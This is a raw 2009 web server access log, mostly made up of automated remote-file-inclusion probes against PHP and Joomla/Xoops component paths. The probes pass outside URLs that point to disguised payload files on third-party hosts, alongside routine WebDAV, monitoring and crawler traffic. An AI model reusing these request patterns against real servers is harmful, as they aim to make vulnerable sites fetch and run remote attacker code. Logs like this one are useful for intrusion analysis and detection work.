218.237.66.229 - - [28/Jul/2009:06:44:59 -0400] "GET /logs/access_log.Q109071200%20%20//////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:45:00 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:45:00 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:45:03 -0400] "GET /logs/access_log.Q109051500/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:45:08 -0400] "GET /logs/access_log.Q109051600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.237.66.229 - - [28/Jul/2009:06:46:02 -0400] "GET /logs/access_log.Q109070300%20%20//////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Jul/2009:06:46:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:46:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:46:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:47:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:47:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:47:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [28/Jul/2009:06:47:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [28/Jul/2009:06:49:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:49:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:49:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.130.198.40 - - [28/Jul/2009:06:49:29 -0400] "GET /logs/access_log.Q109060600/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:49:29 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:49:29 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:49:44 -0400] "GET /logs/access_log.Q109060600/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:49:44 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:49:44 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:50:04 -0400] "GET /logs/access_log.Q109070300/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:50:46 -0400] "GET /logs/access_log.Q109070300/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
172.16.1.180 - - [28/Jul/2009:06:52:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:52:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:52:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [28/Jul/2009:06:52:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.130.198.40 - - [28/Jul/2009:06:52:40 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:52:40 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:52:40 -0400] "GET /logs/access_log.Q109051500/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:52:44 -0400] "GET /logs/access_log.Q109051600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
92.50.143.90 - - [28/Jul/2009:06:53:10 -0400] "GET /logs/access_log.Q109051800/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:53:10 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:53:10 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 11334 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.130.198.40 - - [28/Jul/2009:06:53:52 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:53:52 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:53:52 -0400] "GET /logs/access_log.Q109060100/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
81.137.54.205 - - [28/Jul/2009:06:55:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
81.137.54.205 - - [28/Jul/2009:06:55:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
81.137.54.205 - - [28/Jul/2009:06:55:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
81.137.54.205 - - [28/Jul/2009:06:55:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.6.22.169 - - [28/Jul/2009:06:56:08 -0400] "GET /logs/error_log.Q108120700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [28/Jul/2009:06:56:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:56:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:56:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.130.198.40 - - [28/Jul/2009:06:57:32 -0400] "GET /logs/access_log.Q109060100%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Jul/2009:06:57:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:57:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:57:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [28/Jul/2009:06:57:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.130.198.40 - - [28/Jul/2009:06:57:55 -0400] "GET /logs/access_log.Q109051900%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
92.50.143.90 - - [28/Jul/2009:06:58:17 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.130.198.40 - - [28/Jul/2009:06:58:40 -0400] "GET /logs/access_log.Q109051500%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:58:40 -0400] "GET /logs/access_log.Q109051600%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
172.16.1.69 - - [28/Jul/2009:06:59:14 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:06:59:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:06:59:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.103.16.12 - - [28/Jul/2009:06:59:24 -0400] "GET /show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:06:59:24 -0400] "GET /logs/access_log.Q109051400/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:06:59:24 -0400] "GET /logs/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:06:59:33 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:59:36 -0400] "GET /logs/access_log.Q109051900/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.822"
217.174.254.143 - - [28/Jul/2009:06:59:37 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.822"
217.174.254.143 - - [28/Jul/2009:06:59:37 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.822"
211.133.240.90 - - [28/Jul/2009:07:00:03 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/errors.php?error=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:07:00:03 -0400] "GET //components/com_virtuemart/errors.php?error=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:07:00:03 -0400] "GET /logs//components/com_virtuemart/errors.php?error=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:07:00:12 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/errors.php?error=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
172.16.1.69 - - [28/Jul/2009:07:00:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:07:00:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:07:00:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.174.254.143 - - [28/Jul/2009:07:01:14 -0400] "GET /logs/access_log.Q109051600%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:07:01:23 -0400] "GET /show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:07:01:23 -0400] "GET /logs/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:07:01:23 -0400] "GET /logs/access_log.Q109060600/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.133.240.90 - - [28/Jul/2009:07:02:10 -0400] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 264 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:07:02:10 -0400] "GET /logs/access_log.Q109070300//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 286 "-" "libwww-perl/5.825"
200.103.16.12 - - [28/Jul/2009:07:02:10 -0400] "GET /logs/access_log.Q109051400/show_news.php?cutepath=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.133.240.90 - - [28/Jul/2009:07:02:10 -0400] "GET //includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 259 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:07:02:11 -0400] "GET /logs/access_log.Q109051000//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 286 "-" "libwww-perl/5.825"
210.218.5.234 - - [28/Jul/2009:07:02:18 -0400] "GET /logs/access_log.Q109060600/xoopsgallery/poll/tools/send_reminders.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:07:02:19 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:07:02:19 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
172.16.1.69 - - [28/Jul/2009:07:02:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:07:02:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [28/Jul/2009:07:02:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.174.254.143 - - [28/Jul/2009:07:02:33 -0400] "GET /logs/access_log.Q109051500%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:07:02:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.218.5.234 - - [28/Jul/2009:07:03:10 -0400] "GET /logs/access_log.Q109070300/xoopsgallery/poll/tools/send_reminders.php?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:07:03:42 -0400] "GET /logs/access_log.Q109060600/?_SERVER[DOCUMENT_ROOT]=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.822"
172.16.1.180 - - [28/Jul/2009:07:04:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:07:04:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:07:04:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.0.139.129 - - [28/Jul/2009:07:04:28 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:07:04:28 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:07:04:28 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:07:04:31 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:07:05:09 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:07:05:09 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:07:05:09 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:07:05:11 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:07:05:13 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:07:05:13 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:07:05:13 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:07:05:16 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Jul/2009:07:05:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:07:05:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:07:05:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.133.240.90 - - [28/Jul/2009:07:06:56 -0400] "GET /logs/access_log.Q109060200%20//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 287 "-" "libwww-perl/5.825"
209.59.12.99 - - [28/Jul/2009:07:07:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.188.204.179 - - [28/Jul/2009:07:08:09 -0400] "GET /logs/access_log.Q109060600/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/roxx_jpg.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.825"
210.188.204.179 - - [28/Jul/2009:07:08:09 -0400] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/roxx_jpg.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.825"
210.188.204.179 - - [28/Jul/2009:07:08:10 -0400] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/roxx_jpg.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.825"
66.249.71.204 - - [28/Jul/2009:07:08:11 -0400] "GET /logs/error_log.Q109031000 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.188.204.179 - - [28/Jul/2009:07:08:16 -0400] "GET /logs/access_log.Q109052700/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/roxx_jpg.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.825"
210.188.204.179 - - [28/Jul/2009:07:09:45 -0400] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/roxx_jpg.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.825"
94.75.245.36 - - [28/Jul/2009:07:10:32 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:07:10:33 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 246 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:07:10:33 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 251 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:07:10:33 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
209.62.9.114 - - [28/Jul/2009:07:10:51 -0400] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:51 -0400] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:51 -0400] "GET /logs/access_log.Q109060600/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:54 -0400] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:54 -0400] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:54 -0400] "GET /logs/access_log.Q109060600%20%20/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:55 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:55 -0400] "GET /logs/access_log.Q109052700/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.62.9.114 - - [28/Jul/2009:07:10:55 -0400] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
